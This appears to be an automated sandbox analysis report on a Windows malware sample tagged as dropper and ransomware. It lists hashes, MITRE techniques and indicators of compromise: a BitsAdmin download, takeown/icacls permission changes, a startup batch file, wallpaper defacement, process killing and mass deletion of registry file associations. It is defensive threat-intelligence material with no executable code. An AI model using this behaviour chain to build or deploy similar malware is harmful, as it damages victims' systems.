cc13206ad514d61c7ea83f9380a571b93e23faafa829b04e877fcd38b4e83b75

Analysis

max time kernel
81s
max time network
144s
platform
windows7_x64
resource
win7-20240705-en
resource tags

arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
submitted
09-08-2024 11:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

test.exe
Size

187KB
MD5

d6d75d536a2cff983197d333d0230a05
SHA1

cb3872741f661e1f483f7719619ec5c14db15e66
SHA256

cc13206ad514d61c7ea83f9380a571b93e23faafa829b04e877fcd38b4e83b75
SHA512

1219ebdf6ffe7aad099b4af6b9d837acb8183f671736af0bc627fceb18ce69ae9301167afc56277cf20ec7c9fd9f8d537f755bad8fa33c84c8579499a4489c26
SSDEEP

3072:wSV3J6kkt5h1X+HqTi0BW69hd1MMdxPe9N9uA0/+hL9TBfnPE6g0UasVmkoYcMKV:wHt5hBPi0BW69hd1MMdxPe9N9uA069Tx

Score

8^/10

discovery dropper exploit ransomware

Malware Config

Signatures

Blocklisted process makes network request 7 IoCs

flow	pid	Process
8	1620	WScript.exe
9	1620	WScript.exe
13	2916	WScript.exe
14	2916	WScript.exe
15	2916	WScript.exe
17	2916	WScript.exe
19	2916	WScript.exe

Download via BitsAdmin 1 TTPs 1 IoCs

dropper

BITS Jobs

T1197

pid	Process
2124	bitsadmin.exe

Possible privilege escalation attempt 2 IoCs

exploit

pid	Process
2820	icacls.exe
2516	takeown.exe

Drops startup file 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mssec.bat	cmd.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mssec.bat	cmd.exe

Modifies file permissions 1 TTPs 2 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
2516	takeown.exe
2820	icacls.exe

Enumerates connected drives 3 TTPs 47 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\K:	WScript.exe
File opened (read-only)	\??\P:	WScript.exe
File opened (read-only)	\??\N:	WScript.exe
File opened (read-only)	\??\B:	WScript.exe
File opened (read-only)	\??\H:	WScript.exe
File opened (read-only)	\??\N:	WScript.exe
File opened (read-only)	\??\O:	WScript.exe
File opened (read-only)	\??\W:	WScript.exe
File opened (read-only)	\??\A:	WScript.exe
File opened (read-only)	\??\O:	WScript.exe
File opened (read-only)	\??\R:	WScript.exe
File opened (read-only)	\??\A:	WScript.exe
File opened (read-only)	\??\E:	WScript.exe
File opened (read-only)	\??\H:	WScript.exe
File opened (read-only)	\??\I:	WScript.exe
File opened (read-only)	\??\U:	WScript.exe
File opened (read-only)	\??\V:	WScript.exe
File opened (read-only)	\??\D:	WScript.exe
File opened (read-only)	\??\E:	WScript.exe
File opened (read-only)	\??\B:	WScript.exe
File opened (read-only)	\??\Q:	WScript.exe
File opened (read-only)	\??\S:	WScript.exe
File opened (read-only)	\??\T:	WScript.exe
File opened (read-only)	\??\I:	WScript.exe
File opened (read-only)	\??\Q:	WScript.exe
File opened (read-only)	\??\S:	WScript.exe
File opened (read-only)	\??\V:	WScript.exe
File opened (read-only)	\??\X:	WScript.exe
File opened (read-only)	\??\J:	WScript.exe
File opened (read-only)	\??\L:	WScript.exe
File opened (read-only)	\??\P:	WScript.exe
File opened (read-only)	\??\Y:	WScript.exe
File opened (read-only)	\??\G:	WScript.exe
File opened (read-only)	\??\L:	WScript.exe
File opened (read-only)	\??\T:	WScript.exe
File opened (read-only)	\??\W:	WScript.exe
File opened (read-only)	\??\Y:	WScript.exe
File opened (read-only)	\??\K:	WScript.exe
File opened (read-only)	\??\M:	WScript.exe
File opened (read-only)	\??\R:	WScript.exe
File opened (read-only)	\??\X:	WScript.exe
File opened (read-only)	\??\Z:	WScript.exe
File opened (read-only)	\??\J:	WScript.exe
File opened (read-only)	\??\M:	WScript.exe
File opened (read-only)	\??\U:	WScript.exe
File opened (read-only)	\??\Z:	WScript.exe
File opened (read-only)	\??\G:	WScript.exe

Sets desktop wallpaper using registry 2 TTPs 64 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\DISTRI~1.GIF	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\FORMS_~3.GIF	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\RE99D5~1.GIF	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\STOP_C~1.GIF	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LOGTRA~1.EXE	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MYRIAD~1.OTF	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\IDENTI~1	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\RE78D9~1.GIF	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\TURNON~1.GIF	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\CRYPTO~1.DLL	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Onix32.dll	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\END_RE~1.GIF	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif	cmd.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\atl.dll	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AXE8SH~1.DLL	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\LICENS~1.HTM	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\SERVER~1.GIF	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\CRYPTO~1.SIG	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\STANDA~1.PDF	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\EMAIL_~2.GIF	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\REVIEW~3.GIF	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\SERVER~3.GIF	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\icucnv36.dll	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\JP2KLib.dll	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf	cmd.exe
File opened for modification	C:\Program Files\Java\jre7\bin\server\classes.jsa	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\ADOBEU~1.DLL	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\OPEN_O~1.GIF	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\REVIEW~4.GIF	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\TURNOF~2.GIF	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\ADOBEL~1.DLL	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AXSLE.dll	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ENDED_~1.GIF	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\RE1558~1.GIF	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\REVIEW~1.GIF	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LOGSES~1.DLL	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LOGTRA~1.DLL	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\FORM_R~1.GIF	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\RECDE7~1.GIF	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\TURNOF~1.GIF	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\ahclient.dll	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSIG~1.PDF	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMPRO~1.CER	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\REVIEW~2.GIF	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DEFAUL~1.PDF	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\EMAIL_~1.GIF	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\SERVER~2.GIF	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\CCME_B~1.DLL	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DllHost.exe

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
2604	timeout.exe
276	timeout.exe

Kills process with taskkill 11 IoCs

evasion

pid	Process
2208	taskkill.exe
576	taskkill.exe
2824	taskkill.exe
1636	taskkill.exe
1800	taskkill.exe
2428	taskkill.exe
2344	taskkill.exe
1500	taskkill.exe
724	taskkill.exe
1892	taskkill.exe
1660	taskkill.exe

Modifies registry class 64 IoCs

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.accdw\Access.WebApplicationReference.14\ShellNew	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.jpg\OpenWithList\ois.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.potm	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.pps\PersistentHandler	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.sbr\PersistentHandler	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.desklink	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.edrwx\OpenWithProgIds	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.M2T\OpenWithProgIds	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.mpe\ShellEx\{BB2E617C-0920-11D1-9A0B-00C04FC2D6C1}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.potx\ShellEx\{8895b1c6-b41f-4c1c-a562-0d564250836f}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.bas\PersistentHandler	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.H1D	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.pko	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.pptxml\powerpointxmlfile	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.aob	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.api\AcroExch.Plugin	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.asf\ShellEx\{BB2E617C-0920-11D1-9A0B-00C04FC2D6C1}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.gif\OpenWithList\ois.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.hol\Outlook.File.hol.14\ShellNew	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.hxw	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.mp2v	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.slk	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.ans\PersistentHandler	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.csa\PersistentHandler	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.mxf	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.tif\OpenWithList\ehshell.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.accde\Access.ACCDEFile.14	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.hxi\OpenWithProgids\Shared	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.m14	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.pic	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.ram	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.stm	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.TTS\ShellEx\{e357fccd-a995-4576-b01f-234630154e96}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.avi\PersistentHandler	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.bmp\OpenWithProgids	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.cgm	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.elm	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.rc	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.accdr\Access.ACCDRFile.14\ShellNew	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.asf\OpenWithProgIds	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.gra\MSGraph.Chart.8\ShellNew	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.kci	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.mpeg\OpenWithList\ehshell.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.dbg	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.drv	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.gz\PersistentHandler	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.ics\Outlook.File.ics.14\ShellNew	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.inx	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.M2TS\ShellEx	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.mpg\OpenWithProgIds	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.pmr\PersistentHandler	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.ppam\ShellEx\{BB2E617C-0920-11d1-9A0B-00C04FC2D6C1}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.TS\ShellEx\{BB2E617C-0920-11D1-9A0B-00C04FC2D6C1}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.msp	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.ncb	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.odp\ShellEx\{8895b1c6-b41f-4c1c-a562-0d564250836f}	reg.exe
